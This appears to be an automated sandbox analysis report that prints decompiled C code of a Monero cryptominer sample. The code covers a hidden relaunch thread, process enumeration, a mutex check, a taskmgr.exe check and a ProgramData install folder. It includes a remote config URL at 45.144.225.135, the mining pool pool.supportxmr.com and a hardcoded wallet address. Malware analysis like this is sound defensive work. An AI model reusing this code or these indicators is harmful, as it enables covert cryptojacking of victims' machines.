                                                                                                                                          • Instruction Fuzzy Hash: 37C04C70100148EBDF011F62ED089993F6DEB416957408035F84DA4132DB369D519A98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Executed Functions

C-Code - Quality: 85%
			// Keep-alive thread. _a4 points at { DWORD pid; WCHAR path[]; }: wait for the
			// process with that PID to exit, then silently relaunch the executable and
			// return the new PID as the thread's exit code.
			E035D8390(long* _a4) {
				long _v8;                          // exit code from GetExitCodeProcess
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t17;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);   // PROCESS_QUERY_LIMITED_INFORMATION, the least right GetExitCodeProcess needs
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					_t17 = GetExitCodeProcess(_t35,  &_v8); // executed
					if(_t17 == 0 || _v8 != 0x103) {      // 0x103 = STILL_ACTIVE; leave once the target is gone
						break;
					}
					Sleep(0x7d0); // executed; poll every 2 s
				}
				CloseHandle(_t35);
				E035D1BB0( &_v92, 0, 0x44);           // presumably memset(&si, 0, sizeof(STARTUPINFOW))
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");        // zero PROCESS_INFORMATION
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // 0x8000000 = CREATE_NO_WINDOW
				CloseHandle(_v24.hThread);
				CloseHandle(_v24.hProcess);
				ExitThread(_v24.dwProcessId);        // caller reads the new PID as the thread exit code
			}

APIs
• OpenProcess.KERNEL32(00001000,00000000,?), ref: 035D83A5
• GetExitCodeProcess.KERNEL32(00000000,?), ref: 035D83CD
• Sleep.KERNEL32(000007D0), ref: 035D83E8
• CloseHandle.KERNEL32(00000000), ref: 035D83F3
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 035D842C
• CloseHandle.KERNEL32(?), ref: 035D8435
• CloseHandle.KERNEL32(?), ref: 035D843A
• ExitThread.KERNEL32 ref: 035D843F
• ExitThread.KERNEL32 ref: 035D8447
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
• String ID:
• API String ID: 1465093181-0
• Opcode ID: 19dca3f15d374f621ac9812457748c1bd694b3fcd849c207b09d4c2ddf15c61b
• Instruction ID: 65bc1ed9ba21ce5d9fed701411858b7bb6ecfb921ef76ce1a9160644d69b8ce2
• Opcode Fuzzy Hash: 19dca3f15d374f621ac9812457748c1bd694b3fcd849c207b09d4c2ddf15c61b
• Instruction Fuzzy Hash: 11119331A41319BBEB31EBA4FD49F9E7B78AF04741F240010B608FA1E0D7B0AA54DB91
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 84%
			E035D80E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				struct HINSTANCE__* _t31;
				void* _t34;
				struct HINSTANCE__* _t39;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E035D7EF0("explorer.exe"); // default target when no process list is requested
				} else {
					_t69 = 0; // count of PIDs written to the output array _a8
					_v308 = 0x128; // PROCESSENTRY32.dwSize
					_a4 = 0;
					_t61 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS
					_v8 = _t61;
					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId"); // resolved dynamically
						}
						Process32First(_t61,  &_v308);
						_t34 = E035D8DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300; // record th32ProcessID
						} else {
							 *_t66(_v300,  &_a4); // session id of the entry, stored in _a4
							if(_a4 != _t69) {
								_t55 = E035D1740("csrss.exe",  &_v272); // compare against szExeFile
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E035D1740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						while(Process32Next(_v8,  &_v308) != 0) {
							if(E035D8DD0() == 0 || _t66 == 0) {
								L18:
								 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300; // append PID until _a12 entries are filled
								_t69 = _t69 + 1;
								if(_t69 < _a12) {
									goto L19;
								}
							} else {
								 *_t66(_v300,  &_a4);
								if(_a4 == 0) {
									goto L19;
								} else {
									_t49 = E035D1740("csrss.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t49 == 0) {
										goto L19;
									} else {
										_t51 = E035D1740("winlogon.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t51 == 0) {
											goto L19;
										} else {
											goto L18;
										}
									}
								}
							}
							goto L20;
							L19:
						}
						L20:
						CloseHandle(_v8);
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}
                                                                                                                                          0x035d81f5
                                                                                                                                          0x035d81dd
                                                                                                                                          0x00000000
                                                                                                                                          0x035d821e
                                                                                                                                          0x035d822d
                                                                                                                                          0x035d8231
                                                                                                                                          0x035d8234
                                                                                                                                          0x035d823a
                                                                                                                                          0x035d8240
                                                                                                                                          0x035d8243
                                                                                                                                          0x035d8243
                                                                                                                                          0x035d8250
                                                                                                                                          0x035d8116
                                                                                                                                          0x035d811d
                                                                                                                                          0x035d811d
                                                                                                                                          0x035d8114

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,74B5F7F0,00000000), ref: 035D8107
• LoadLibraryA.KERNEL32(kernel32.dll,035D67D1,00000002,00000000,74B5F7F0,00000000), ref: 035D8126
• GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 035D8139
• Process32First.KERNEL32(00000000,00000128), ref: 035D8149
• Process32Next.KERNEL32(00001000,00000128,00000000,00000128), ref: 035D81B6
• Process32Next.KERNEL32(00001000,00000128,00001000,00000128,00000000,00000128), ref: 035D8228
• CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 035D8234
• FreeLibrary.KERNEL32(00000000), ref: 035D8243
Strings
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcSnapshotToolhelp32
• String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
• API String ID: 2254598907-4289567422
• Opcode ID: de79d9b868e6eaf7a35caf179d073136a977cda304ce10ee2aef0e14b32a8f43
• Instruction ID: a166576b95e7346ef72933b3f4751a9e4d99d044f7acaf2aaec2bd153c63204c
• Opcode Fuzzy Hash: de79d9b868e6eaf7a35caf179d073136a977cda304ce10ee2aef0e14b32a8f43
• Instruction Fuzzy Hash: E2416275900219AADF31EFA8FC41AEEB7B8BF44351F0400A5EC18D6160E771DA95CA91
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 34%
E035D8B20(WCHAR* _a4, intOrPtr _a8) {
	long* _v8;
	int _v12;
	long _v16;
	int _v20;
	char _v24;
	char _v56;
	void _v1080;
	char _t39;
	long** _t42;
	int* _t43;
	int _t46;
	char* _t51;
	void* _t60;
	intOrPtr* _t69;
	int _t70;
	long _t72;
	signed int _t73;
	signed int _t75;
	intOrPtr _t80;
	void* _t82;
	void* _t87;

	asm("movups xmm0, [0x35daa14]");
	_t39 =  *0x35daa24; // 0x0
	_v8 = 0;
	_v12 = 0;
	_v16 = 0;
	_v20 = 0;
	asm("movups [ebp-0x24], xmm0");
	_v24 = _t39;
	_t82 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x8000000, 0);
	if(_t82 == 0xffffffff) {
		L3:
		return 0;
	} else {
		_t42 =  &_v8;
		__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000);
		if(_t42 != 0) {
			_t43 =  &_v12;
			__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43);
			if(_t43 != 0) {
				_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0);
				if(_t46 == 0) {
					L11:
					_push(0);
					goto L12;
				} else {
					_t69 = __imp__CryptHashData;
					while(1) {
						_t72 = _v16;
						if(_t72 == 0) {
							break;
						}
						_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
						_push(0);
						if(_t60 == 0) {
							L12:
							CryptReleaseContext(_v8);
							__imp__CryptDestroyHash(_v12);
							CloseHandle(_t82);
							L13:
							return 0;
						} else {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??);
							if(_t46 != 0) {
								continue;
							} else {
								goto L11;
							}
						}
						goto L20;
					}
					if(_t46 == 0) {
						goto L11;
					} else {
						_v20 = 0x10;
						_t51 =  &_v56;
						__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
						if(_t51 == 0) {
							goto L13;
						} else {
							_t70 = _v20;
							_t75 = 0;
							if(_t70 != 0) {
								_t80 = _a8;
								asm("o16 nop [eax+eax]");
								do {
									_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
									 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
									 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
									_t75 = _t75 + 1;
								} while (_t75 < _t70);
							}
							__imp__CryptDestroyHash(_v12);
							CryptReleaseContext(_v8, 0);
							CloseHandle(_t82);
							return 1;
						}
					}
				}
			} else {
				CloseHandle(_t82);
				CryptReleaseContext(_v8, 0);
				return 0;
			}
		} else {
			CloseHandle(_t82);
			goto L3;
		}
	}
	L20:
}

                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c31
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c1a
                                                                                                                                          0x035d8c59
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c5b
                                                                                                                                          0x035d8c60
                                                                                                                                          0x035d8c68
                                                                                                                                          0x035d8c71
                                                                                                                                          0x035d8c79
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8c7b
                                                                                                                                          0x035d8c7b
                                                                                                                                          0x035d8c7e
                                                                                                                                          0x035d8c82
                                                                                                                                          0x035d8c84
                                                                                                                                          0x035d8c87
                                                                                                                                          0x035d8c90
                                                                                                                                          0x035d8c90
                                                                                                                                          0x035d8ca2
                                                                                                                                          0x035d8caa
                                                                                                                                          0x035d8cae
                                                                                                                                          0x035d8caf
                                                                                                                                          0x035d8c90
                                                                                                                                          0x035d8cb6
                                                                                                                                          0x035d8cc1
                                                                                                                                          0x035d8cc8
                                                                                                                                          0x035d8cd9
                                                                                                                                          0x035d8cd9
                                                                                                                                          0x035d8c79
                                                                                                                                          0x035d8c59
                                                                                                                                          0x035d8bbc
                                                                                                                                          0x035d8bbd
                                                                                                                                          0x035d8bc8
                                                                                                                                          0x035d8bd4
                                                                                                                                          0x035d8bd4
                                                                                                                                          0x035d8b94
                                                                                                                                          0x035d8b95
                                                                                                                                          0x00000000
                                                                                                                                          0x035d8b95
                                                                                                                                          0x035d8b92
                                                                                                                                          0x00000000

APIs
• CreateFileW.KERNEL32(035D363E,80000000,00000001,00000000,00000003,08000000,00000000), ref: 035D8B6E
• CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 035D8B8A
• CloseHandle.KERNEL32(00000000), ref: 035D8B95
• CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 035D8BB2
• CloseHandle.KERNEL32(00000000), ref: 035D8BBD
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 035D8BC8
• ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 035D8BF0
• CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 035D8C14
• ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 035D8C2D
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 035D8C38
• CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 035D8C41
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 035D8C48
• CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 035D8C71
• CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 035D8CB6
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 035D8CC1
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 035D8CC8
Memory Dump Source
• Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
Yara matches
Similarity
• API ID: Crypt$Hash$CloseContextHandle$FileRelease$CreateDestroyRead$AcquireDataParam
• String ID:
• API String ID: 2794010843-0
• Opcode ID: 7cc4bd4bf0c29837b73926786d0d83d0e72fbd7b4eaf1bf00a7cbab7ed9f6b83
• Instruction ID: 6500646ddeac4e78d08998d14875638529b2d4b14bc806f4a89a628d8404c66c
• Opcode Fuzzy Hash: 7cc4bd4bf0c29837b73926786d0d83d0e72fbd7b4eaf1bf00a7cbab7ed9f6b83
• Instruction Fuzzy Hash: D4519371A02218BBEB30EBA4FD45FEDBBB8EF04701F1400A5FA04F51A0D771665A9B64
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 93%
_entry_() {
	struct _SECURITY_ATTRIBUTES* _v8;
	struct _SECURITY_ATTRIBUTES* _v12;
	intOrPtr _v16;
	char _v20;
	int _v24;
	struct _SECURITY_ATTRIBUTES* _v28;
	long _v32;
	long _v36;
	char _v38;
	short _v40;
	char _v48;
	char _v72;
	char _v592;
	char _v1112;
	char _v2136;
	char _v3160;
	void _v7224;
	long _t56;
	long _t66;
	void* _t72;
	void* _t74;
	void* _t75;
	void* _t76;
	void* _t77;
	void* _t82;
	void* _t84;
	void* _t89;
	void* _t90;
	void* _t91;
	intOrPtr _t93;
	void* _t94;
	long _t96;
	long _t99;
	void* _t102;
	char _t110;
	char _t114;
	char _t117;
	char _t119;
	void* _t125;
	void* _t137;
	void* _t139;
	void* _t140;
	signed int _t148;
	char _t150;
	void* _t153;
	void* _t158;
	intOrPtr _t160;
	struct _SECURITY_ATTRIBUTES* _t161;
	void* _t166;
	struct _SECURITY_ATTRIBUTES* _t168;
	intOrPtr _t169;
	void* _t171;
	void* _t174;
	void* _t175;
	void* _t176;
	void* _t177;
	void* _t178;
	void* _t179;
	void* _t180;
	void* _t181;
	void* _t182;
	void* _t183;
	void* _t185;
	void* _t186;
	void* _t187;
	void* _t188;
	void* _t189;
	void* _t196;
	void* _t223;
	void* _t225;
	void* _t226;
	void* _t234;

	_v8 = 0;
	_v12 = 0;
	_v28 = 0;
	_t56 = GetTickCount();
	_t150 = 0;
	_v32 = _t56;
	_v36 = _t56;
	_v24 = 0;
	 *0x37a2df4 = 0;
	E035D1670(0x37a2128, 0, 0xcc8);
	asm("xorps xmm0, xmm0");
	asm("movq [ebp-0x10], xmm0");
	E035D1BB0( &_v7224, 0, 0xfe0);
	// Decompiler output: copies 0x3f8 << 2 = 4064 bytes (the same size cleared above).
	// The 95-character string beginning with '4' has the format of a Monero wallet address,
	// consistent with the XMRig detection for this sample.
	memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  &_v7224, 0x3f8 << 2);
	_t152 = 0;
	// SEM_NOGPFAULTERRORBOX (0x2): suppresses the crash dialog if the process faults.
	SetErrorMode(SetErrorMode(2) | 0x00000002);
	// Builds the mutex name "e9c1286a28d82a2d0ee6" at 0x37a206c; the name is a host
	// artifact that can be used to detect a running instance.
	E035D17E0(0x37a206c, "e9c1286a28d82a2d0ee6");
	_t174 = _t171 + 0x2c;
	if(CreateMutexA(0, 0, 0x37a206c) == 0) {
		ExitProcess(0x1e); // mutex creation failed: exit code 0x1e
	}
	_t158 = GetLastError;
	_t66 = GetLastError();
	_t191 = _t66 - 0xb7;
	// ERROR_ALREADY_EXISTS (0xb7): another instance holds the mutex, exit with code 0x1f.
	if(_t66 == 0xb7) {
		ExitProcess(0x1f);
	}
	E035D3220(0, SetErrorMode, _t191);
	// Parses the command line; if a second argument is present it is compared
	// against "--show-window" and the result is folded into the flag at 0x37a1bb8.
	_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
	if(_t166 != 0 && _v24 > 1) {
		_t148 = E035D19C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
		_t174 = _t174 + 8;
		asm("sbb eax, eax");
		 *0x37a1bb8 =  *0x37a1bb8 &  ~_t148;
	}
	LocalFree(_t166);
	_t72 = E035D1000(_t152, _t158, _t166,  *0x37a1314);
	_t175 = _t174 + 4;
	_t195 = _t72;
	if(_t72 != 0) {
		E035D8070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
		_t176 = _t175 + 4;
		_t196 =  *0x37a1bc0 - _t150; // 0x0
		if(_t196 != 0) {
			E035D17E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
			_t176 = _t176 + 8;
                                                                                                                                          					}
                                                                                                                                          					_t74 = E035D1600(0x37a204c, "LKBNMTFJgl");
                                                                                                                                          					_t177 = _t176 + 8;
                                                                                                                                          					if(_t74 != 0) {
                                                                                                                                          						_t75 = E035D1600("csrss.exe", "csrss.exe");
                                                                                                                                          						_t178 = _t177 + 8;
                                                                                                                                          						if(_t75 != 0) {
                                                                                                                                          							_t76 = E035D1600("viTRMUuKeV", "viTRMUuKeV");
                                                                                                                                          							_t179 = _t178 + 8;
                                                                                                                                          							if(_t76 != 0) {
                                                                                                                                          								_t77 = E035D7FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x35daae0, 0x23);
                                                                                                                                          								_t180 = _t179 + 0xc;
                                                                                                                                          								if(_t77 != 0) {
                                                                                                                                          									E035D1970("C:\ProgramData\LKBNMTFJgl", "\\");
                                                                                                                                          									E035D1970("C:\ProgramData\LKBNMTFJgl", 0x37a204c);
                                                                                                                                          									_t181 = _t180 + 0x10;
                                                                                                                                          									if(CreateDirectoryW(?str?, 0) != 0 || GetLastError() == 0xb7) {
                                                                                                                                          										if(E035D8DD0() != 0 &&  *0x37a210c == 1) {
                                                                                                                                          											 *0x37a211c = CreateThread(0, 0, E035D8450, 0, 0, 0);
                                                                                                                                          										}
                                                                                                                                          										_t82 = E035D17B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                                                          										_t182 = _t181 + 8;
                                                                                                                                          										if(_t82 == 0) {
                                                                                                                                          											L33:
                                                                                                                                          											_t84 = E035D3150( &_v1112);
                                                                                                                                          											_t183 = _t182 + 4;
                                                                                                                                          											if(_t84 != 0) {
                                                                                                                                          												E035D30B0( &_v1112,  &_v2136,  &_v3160);
                                                                                                                                          												__imp__SetThreadExecutionState(0x80000041, 0);
                                                                                                                                          												_t89 = E035D3CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
                                                                                                                                          												_t185 = _t183 + 0x24;
                                                                                                                                          												if(_t89 == 0) {
                                                                                                                                          													L91:
                                                                                                                                          													ExitProcess(0x3d);
                                                                                                                                          												}
                                                                                                                                          												_t90 = E035D3CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
                                                                                                                                          												_t186 = _t185 + 0x14;
                                                                                                                                          												if(_t90 == 0) {
                                                                                                                                          													goto L91;
                                                                                                                                          												}
                                                                                                                                          												L38:
                                                                                                                                          												while(1) {
                                                                                                                                          													if( *0x37a1300 != 0) {
                                                                                                                                          														_t169 = _v28;
                                                                                                                                          														if(_t169 == 0) {
                                                                                                                                          															_t96 = GetTickCount();
                                                                                                                                          															_t215 = _t96 - _v36 - 0x4e20;
                                                                                                                                          															if(_t96 - _v36 > 0x4e20) {
                                                                                                                                          																E035D65D0(_t215);
                                                                                                                                          																_t170 =  !=  ? 1 : _t169;
                                                                                                                                          																_v28 =  !=  ? 1 : _t169;
                                                                                                                                          															}
                                                                                                                                          														}
                                                                                                                                          													}
                                                                                                                                          													if( *0x37a1308 == 3) {
                                                                                                                                          														_t160 =  *0x37a1310; // 0x7530
                                                                                                                                          														_t161 = _t160 + 1;
                                                                                                                                          														__eflags = _t161;
                                                                                                                                          													} else {
                                                                                                                                          														_t161 = E035D8040();
                                                                                                                                          													}
                                                                                                                                          													_t91 = E035D8A50(_t150);
                                                                                                                                          													_t187 = _t186 + 4;
                                                                                                                                          													_t168 =  ==  ? 1 : _t91;
                                                                                                                                          													if( *0x37a1304 == 0) {
                                                                                                                                          														_t93 = _v12;
                                                                                                                                          													} else {
                                                                                                                                          														_t93 = E035D7EF0("taskmgr.exe");
                                                                                                                                          														_t187 = _t187 + 4;
                                                                                                                                          														_v12 = _t93;
                                                                                                                                          													}
                                                                                                                                          													if(_t150 == 0 || _t168 == 0) {
                                                                                                                                          														if(_t93 != 0) {
                                                                                                                                          															goto L58;
                                                                                                                                          														}
                                                                                                                                          														_t223 =  *0x37a1320 - _t93; // 0x0
                                                                                                                                          														if(_t223 != 0 ||  *0x37a2110 != _t93) {
                                                                                                                                          															goto L58;
                                                                                                                                          														} else {
                                                                                                                                          															_t225 = _t161 -  *0x37a1310; // 0x7530
                                                                                                                                          															if(_t225 <= 0) {
                                                                                                                                          																__eflags =  *0x37a1308;
                                                                                                                                          																if( *0x37a1308 != 0) {
                                                                                                                                          																	_t117 = E035D3050(_t150, _t152,  &_v2136, 0);
                                                                                                                                          																	_t187 = _t187 + 8;
                                                                                                                                          																	_t150 = _t117;
                                                                                                                                          																	_t168 = 1;
                                                                                                                                          																}
                                                                                                                                          																_v8 = 0;
                                                                                                                                          																goto L68;
                                                                                                                                          															}
                                                                                                                                          															_t119 = E035D3050(_t150, _t152,  &_v3160, _t93);
                                                                                                                                          															_t187 = _t187 + 8;
                                                                                                                                          															_v8 = 1;
                                                                                                                                          															_t150 = _t119;
                                                                                                                                          															_t168 = 1;
                                                                                                                                          															goto L59;
                                                                                                                                          														}
                                                                                                                                          													} else {
                                                                                                                                          														L58:
                                                                                                                                          														__eflags = _v8;
                                                                                                                                          														if(_v8 == 0) {
                                                                                                                                          															L68:
                                                                                                                                          															_t234 = _t161 -  *0x37a1310; // 0x7530
                                                                                                                                          															if(_t234 <= 0) {
                                                                                                                                          																L75:
                                                                                                                                          																__eflags = _v12;
                                                                                                                                          																if(_v12 == 0) {
                                                                                                                                          																	L77:
                                                                                                                                          																	if( *0x37a1320 == 0) {
                                                                                                                                          																		L79:
                                                                                                                                          																		if( *0x37a2110 == 0) {
                                                                                                                                          																			L82:
                                                                                                                                          																			_t94 = E035D17B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                                                          																			_t186 = _t187 + 8;
                                                                                                                                          																			if(_t94 != 0) {
                                                                                                                                          																				_t99 = GetTickCount();
                                                                                                                                          																				_t152 =  *0x37a1bb4 * 0xea60;
                                                                                                                                          																				_t245 = _t99 - _v32 -  *0x37a1bb4 * 0xea60;
                                                                                                                                          																				if(_t99 - _v32 >  *0x37a1bb4 * 0xea60) {
                                                                                                                                          																					_v32 = GetTickCount();
                                                                                                                                          																					_t102 = E035D4DE0(_t152, _t153, _t245, "http://45.144.225.135/config.txt", "FALSE", 0x37a2128, _t150, _t168);
                                                                                                                                          																					_t186 = _t186 + 0x14;
                                                                                                                                          																					if(_t102 != 0) {
                                                                                                                                          																						if(E035D39B0(_t153) != 0) {
                                                                                                                                          																							if(_t168 != 0) {
                                                                                                                                          																								E035D8730(_t150);
                                                                                                                                          																								_t186 = _t186 + 4;
                                                                                                                                          																							}
                                                                                                                                          																							E035D3CA0(_t152, _t153, 1, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
                                                                                                                                          																							E035D3CA0(_t152, _t153, 0, "pool.supportxmr.com:3333", "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", 0x37a12c0,  *0x37a131c);
                                                                                                                                          																							_t186 = _t186 + 0x28;
                                                                                                                                          																						}
                                                                                                                                          																						E035D3B50(_t153, _v20, _v16);
                                                                                                                                          																						_t186 = _t186 + 8;
                                                                                                                                          																					}
                                                                                                                                          																				}
                                                                                                                                          																			}
                                                                                                                                          																			Sleep(0xfa0);
                                                                                                                                          																			continue;
                                                                                                                                          																		}
                                                                                                                                          																		L80:
                                                                                                                                          																		if(_t168 == 0) {
                                                                                                                                          																			goto L82;
                                                                                                                                          																		}
                                                                                                                                          																		L81:
                                                                                                                                          																		E035D8730(_t150);
                                                                                                                                          																		_t187 = _t187 + 4;
                                                                                                                                          																		_t168 = 0;
                                                                                                                                          																		goto L82;
                                                                                                                                          																	}
                                                                                                                                          																	L78:
                                                                                                                                          																	if(_t168 != 0) {
                                                                                                                                          																		goto L81;
                                                                                                                                          																	}
                                                                                                                                          																	goto L79;
                                                                                                                                          																}
                                                                                                                                          																L76:
                                                                                                                                          																__eflags = _t168;
                                                                                                                                          																if(_t168 != 0) {
                                                                                                                                          																	goto L81;
                                                                                                                                          																}
                                                                                                                                          																goto L77;
                                                                                                                                          															}
                                                                                                                                          															if(_v12 != 0) {
                                                                                                                                          																goto L76;
                                                                                                                                          															}
                                                                                                                                          															if( *0x37a1320 != 0) {
                                                                                                                                          																goto L78;
                                                                                                                                          															}
                                                                                                                                          															if( *0x37a2110 != 0) {
                                                                                                                                          																goto L80;
                                                                                                                                          															}
                                                                                                                                          															if(_t168 != 0) {
                                                                                                                                          																E035D8730(_t150);
                                                                                                                                          																_t187 = _t187 + 4;
                                                                                                                                          															}
                                                                                                                                          															_t110 = E035D3050(_t150, _t152,  &_v3160, 0);
                                                                                                                                          															_t187 = _t187 + 8;
                                                                                                                                          															_v8 = 1;
                                                                                                                                          															_t150 = _t110;
                                                                                                                                          															_t168 = 1;
                                                                                                                                          															goto L77;
                                                                                                                                          														}
                                                                                                                                          														L59:
                                                                                                                                          														_t226 = _t161 -  *0x37a1310; // 0x7530
                                                                                                                                          														if(_t226 > 0) {
                                                                                                                                          															goto L75;
                                                                                                                                          														}
                                                                                                                                          														if(_v12 != 0) {
                                                                                                                                          															goto L76;
                                                                                                                                          														}
                                                                                                                                          														if( *0x37a1320 != 0) {
                                                                                                                                          															goto L78;
                                                                                                                                          														}
                                                                                                                                          														if( *0x37a2110 != 0) {
                                                                                                                                          															goto L80;
                                                                                                                                          														}
                                                                                                                                          														if(_t168 != 0) {
                                                                                                                                          															E035D8730(_t150);
                                                                                                                                          															_t187 = _t187 + 4;
                                                                                                                                          															_t168 = 0;
                                                                                                                                          														}
                                                                                                                                          														if( *0x37a1308 != 0) {
                                                                                                                                          															_t114 = E035D3050(_t150, _t152,  &_v2136, 0);
                                                                                                                                          															_t187 = _t187 + 8;
                                                                                                                                          															_t150 = _t114;
                                                                                                                                          															_t168 = 1;
                                                                                                                                          														}
                                                                                                                                          														_v8 = 0;
                                                                                                                                          														goto L68;
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          											ExitProcess(0x1c);
                                                                                                                                          										} else {
                                                                                                                                          											asm("movq xmm0, [0x37a206c]");
                                                                                                                                          											_v40 =  *0x37a2074;
                                                                                                                                          											asm("movq [ebp-0x2c], xmm0");
                                                                                                                                          											_v38 = _t150;
                                                                                                                                          											E035D1A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          											_t125 = E035D1600( &_v72,  &_v48);
                                                                                                                                          											_t183 = _t182 + 0x10;
                                                                                                                                          											if(_t125 == 0) {
                                                                                                                                          												ExitProcess(0x2f);
                                                                                                                                          											}
                                                                                                                                          											E035D1970( &_v592, "\\");
                                                                                                                                          											E035D1970( &_v592,  &_v72);
                                                                                                                                          											E035D1970( &_v592, "_");
                                                                                                                                          											E035D1970( &_v592, L"3.1.0");
                                                                                                                                          											_t188 = _t183 + 0x20;
                                                                                                                                          											_t137 =  *0x37a10b8( &_v592,  &_v20, 0, 0);
                                                                                                                                          											_t207 = _t137 - 1;
                                                                                                                                          											if(_t137 == 1) {
                                                                                                                                          												_t139 = E035D37E0(_t207,  &_v592);
                                                                                                                                          												_t189 = _t188 + 4;
                                                                                                                                          												_t208 = _t139;
